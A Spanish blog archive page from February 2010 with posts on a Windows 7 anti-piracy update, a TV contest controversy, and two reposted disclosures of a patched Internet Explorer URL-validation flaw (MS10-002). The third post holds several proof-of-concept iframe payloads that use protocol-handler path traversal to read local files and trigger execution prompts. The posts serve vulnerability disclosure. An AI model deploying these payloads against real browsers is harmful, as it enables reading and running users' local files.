Archivo para 25 febrero 2010

Microsoft distribuye una actualización para detectar copias piratas de Windows 7

Algunos de ustedes ya se podrán haber dado cuenta de que Microsoft ha empezado a distribuir un parche “de seguridad” para Windows 7 cuya finalidad es detectar las copias piratas y avisarle al usuario de que está infringiendo la norma. La actualización, que pesa 1,2 MB, está apareciendo durante esta semana en Windows Update marcada como Importante (es decir, se descarga automáticamente), pero aun así no se descarga automáticamente. De todos modos, quienes la hayan instalado y tengan una copia no legal de la RTM de Windows 7 tienen problemas a partir de ahora (con la RC es una historia distinta).

De acuerdo a Microsoft, estas actualizaciones son capaces de detectar más de 70 hacks usados para activar el SO de forma fraudulenta. Además, la actualización de momento aparece solo en las ediciones Home Premium, Professional y Ultimate, pero pronto será distribuida en las ediciones Starter y Home Basic. Seguir leyendo ‘Microsoft distribuye una actualización para detectar copias piratas de Windows 7’

La sombra del timo televisivo se cierne sobre ‘Sálvame’ tras unos titubeos de Jorge Javier Vázquez

  • Uno de los participantes en el concurso ‘Tienes un millón’, incluido en ‘Sálvame’, ganó un premio mucho menor del habitual.
  • El programa asegura que actuó según las bases del juego.
  • Telecinco han distribuido “las bases oficiales” (pdf).

El comportamiento dubitativo de Jorge Javier Vázquez durante el concurso Tienes un millón, incluido en su programa Sálvame, despertó las alarmas. Más aún el “por favor, no me hagáis esto” que el presentador dirigió a los regidores del espacio cuando supuestamente le informaron por el pinganillo del premio que debía anunciar para el participante del día: un único lingote de oro valorado en 1.200 euros, cuando el trofeo habitual es un conjunto de lingotes de un coste de un millón de euros.

Más tarde, y tras muchas caras de extrañeza y confusión, llegaron las explicaciones.  Al parecer, una de las claúsulas del concurso, que hasta entonces Jorge Javier y público desconocían, indicaba que si el ganador era seleccionado en unas determinadas condiciones… el premio se reducía a su décima parte.

¿Qué ocurrió?

Tienes un millón regala cada día un premio. La dinámica del concurso es la siguiente: la organización elige un número de la guía telefónica al azar. Si alguien contesta al otro lado del aparato, recibirá un premio en oro. Este consiste en un conjunto de lingotes valorados en un millón de euros si el receptor ha enviado antes un SMS al concurso. Si no lo ha hecho, sólo tendrá derecho a un  lingote.

Telecinco ha cumplido en todo  momento con lo establecido en sus bases.

El pasado día 17 la primera llamada que realizó Jorge Javier no fue respondida, por lo que el presentador pidió consejo a los regidores sobre lo que debía de hacer. A continuación, indicó que, según las bases “ante notario” debía telefonearse  al participante cuyo número fuera aritméticamente más próximo al número selecciónado. El segundo teléfono al que llamaron sí tuvo respuesta y pertenecía a un joven que había mandado su SMS para optar al premio máximo. Sin embargo, hubo de conformarse con los 1.200 euros en oro porque su número no había sido seleccionado en primer lugar.

A la segunda, sólo un lingote.

Seguir leyendo ‘La sombra del timo televisivo se cierne sobre ‘Sálvame’ tras unos titubeos de Jorge Javier Vázquez’

Internet explorer 7 & 8 URL Validation Vulnerability

############################################
Internet explorer 7 & 8 url validation vulnerability
Reportado por: http://lostmon.blogspot.com/2010/02/internet-explorer-7-8-url-validation.html
URL afectada: http://www.microsoft.com
Avance acerca del bug: http://lostmon.blogspot.com/2010/02/internet-explorer-6-7-8-url-validation.html
Boletines relacionados: MS10-002 and ms10-007
CVE relacionado 2010-0027
OSVDB ID relacionado: 62245 and 62245
Secunia relacionado: SA38501 and SA38209
BID relacionado: 37884
############################################

############
Descripción
############

Internet Explorer contiene una vulnerabilidad de ejecución remota de código al validar correctamente la entrada.
Un atacante podría aprovechar esta vulnerabilidad mediante la construcción de una URL especialmente diseñada. Cuando un usuario hace click en la URL, la vulnerabilidad podría permitir la ejecución remota de código si ésto no se parchea.
Un atacante que aprovechase esta vulnerabilidad podría obtener los mismos derechos de usuario como usuario administrador registrado.

#################
Versiones afectadas
#################

Está probado en las versiones Internet Explorer 7 & 8 de windows.

En todas las versiones de Windows 7

Windows xp home y Windows xs pro

Por lo que podéis buscar en el boletín de Microsoft en qué sistemas es o no vulnerable para obtener una lista de todos los productos afectados por este bug.

#############
Seguimiento
#############

descubierto: 05/11/2009
informe al proveedor 15-11-2009
respuesta de los proveedores :15-11-2009
aceptación de proveedor en administrar el caso 19-11-2009
parcheo del proveedor 21-01-2010
distribuidor Patch2 :09-02-2010
divulgación pública: 21-01-2010
detalles de divulgación :10-02-2010

##############
Solución
##############

Ver: http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx
y: http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx

para más detalles bajar el parche de Microsoft

#######################
Código de ejemplo y PoC
#######################

Esta vulnerabilidad está basada en la forma de cómo Internet Explorer valida los controladores de URI así como el char especial ‘#’

Para las pruebas y entendiendo primero de Internet Explorer, lo abrimos y ecribimos en la barra de direcciones una dirección falsa: `handler:’ esto causa que IE nos redirija a una página interna ‘res://ieframe.dll/unknownprotocol.htm’ a causa de protocolo desconocido.

y si hacemos => handler:http://%5Bsome-host%5D’, IE espera a abrir el host, pero no muestra ningún error o error desconocido de protocolo.

Si volvemos a escribir en la barra de direcciones: ‘handler:handler2:’ IE nos vuelve a redirijir a la página anterior: ‘res://ieframe.dll/unknownprotocol.htm’

Pero si concadenamos dos controladores de protocolo y usamos el char especial ‘#’ usando: ‘handler:handler#:’ IE nos muestra una alert diciendo “internet explorer no encuentra file:///’

Con esta combinación IE usa el controlador de protocolo.

Con este alert podemos pensar … si queremos concadenar dos controladores y el char # y una ruta de archivo a la cual podemos tener acceso a los archivos en el disco duro.

“handler:handler#:c:\windows\calc.exe’
Pero nuevamente nos dice que ‘internet explorer no encuentra el archivo’

Y si ponemos el acceso de archivos como trasversal: handler:handler#:../../../../C:\windows/calc.exe’
Ejecuta un prompt para descargar el archivo y hemos eludido las restricciones bypass!!

Así estamos trabajando en la barra de direcciones.

Una página web puede utilizar esta vulnerabilidad para aprovecharla y pedir para descargar el fichero que sea ? SÍ

podemos construir una página web con un iframe como por ejemplo:

############# PoC primero #################
<html>
<iframe id=”myIframe”
src=”handler:handler#:../../../../C:\windows/calc.exe”>
</html>
################# EOF #################

Si lo abrimos a través de la carpeta local, o mediante un servidor local o como servidor de LAN o un servidor remoto, en todos los casos, por ejemplo preguntándole para descargar.

Podemos acceder a cualquier archivo en el disco duro de manera que se puede ejecutar o leer el contenido de un archivo ? SÍ

############## PoC segundo #############
<html>
<iframe id=”myIframe”
src=”handler:handler#:../../../../C:\our_txtfile.txt”>
</html>

############# EOF #################

Cuando abrimos este PoC, lee el contenido de our_txtfile.txt y lo muestra en el marco.

Podemos ejecutar archivos ? SÍ

Se puede ejecutar un archivo HTML o un archivo XML o búsqueda-ms
desde el disco duro por ejemplo:

############# PoC tercero ###############
<html>
<iframe id=”myIframe”
src=”handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms”>
</iframe>
</html>

############### EOF ###########

Si miramos Explorer se ejecuta una búsqueda en local 😀

Se puede leer el contenido de cualquier archivo y subirlo a un servidor o gestionar el contenido ? Yo no he encontrado una manera de hacerlo, ya que a veces Internet Explorer niega el acceso a los contenidos del iframe.

############# PoC cuarto ##############

<html>
<head>
</head>
<body>
<script type=”text/javascript”>
function getContentFromIframe(iFrameName)
{
var myIFrame = document.getElementById(iFrameName);
var content = myIFrame.contentWindow.document.body.innerHTML;
alert(‘content: ‘ + content);

content = ‘change iframe content’;
myIFrame.contentWindow.document.body.innerHTML = content;
}
</script> <iframe id=”myIframe”
src=”handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms”></iframe>

<a href=”#” onclick=”getContentFromIframe(‘myIframe’)”>Get the content</a>

</body>
</html>

##################### EOF #############################

Que daría un error de acceso denegado, si utilizásemos XMLHttpRequest () sigue sin funcionar y de nuevo nos deniega el acceso:

########### PoC quinto ######################
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;

Seguir leyendo ‘Internet explorer 7 & 8 URL Validation Vulnerability’

Internet explorer 6, 7 y 8 URL Validation Vulnerability

###################################
Internet explorer 6 7 and 8 URL Validation Vulnerability
Afectado:  http://www.Microsoft.com
Notificación al afectado: Confirmación del afectado:
REF Boletín:MS10-002
#########################################

Internet Explorer contiene una vulnerabilidad de ejecución remota de código al validar correctamente la entrada.
Un atacante podría aprovechar esta vulnerabilidad mediante la construcción de una URL especialmente diseñada. Cuando un usuario hace click en la URL, la vulnerabilidad podría permitir la ejecución remota de código si ésto no se parchea.
Un atacante que aprovechase esta vulnerabilidad podría obtener los mismos derechos de usuario como usuario registrado.

Por lo que si un usuario inicia sesión con derechos de usuario administrativos, un atacante que aprovechase esta vulnerabilidad podría tomar control total del sistema afectado. Se podrían instalar programas, ver, cambiar o eliminar datos o archivos, hasta crear nuevas cuentas con derechos de usuario.

Para ver esta vulnerabilidad como una entrada estándar en las listas de vulnerabilidades y exposiciones , consulte MS10-002 y CVE-2010-0027.

No hay más detalles en este momento.

Comentar que tengo un PoC pero por ahora lo mantengo en privacidad.

Tiempo transcurrido de esta vulnerabilidad:

Descubierta el: 05/11/2009
Información enviada al proveedor: 15-11-2009
Respuesta de los proveedores: 15-11-2009
Aceptación del proveedor en administrar el caso: 19-11-2009
El proveedor parchea la vulnerabilidad: 21-01-2010

################# €nd###############

Thnx to estrella To be mi ligth
Thnx To icar0 & sha0 from Badchecksum
Thnx To Google security Team For support
Thnx To MSRC for Support

atentamente:
Security Research & Analisys.
Lostmon (lostmon@gmail.com)

——————–

thz Lost 😉


Blog Stats

  • 612,371 visitas

RSS

Feed
febrero 2010
L M X J V S D
« Dic   Mar »
1234567
891011121314
15161718192021
22232425262728

Usuarios online:

counter

Otras URL’s

TiraEcol

Tira Ecol
BlogESfera Directorio de Blogs Hispanos - Agrega tu Blog
Google PageRank 
		Checker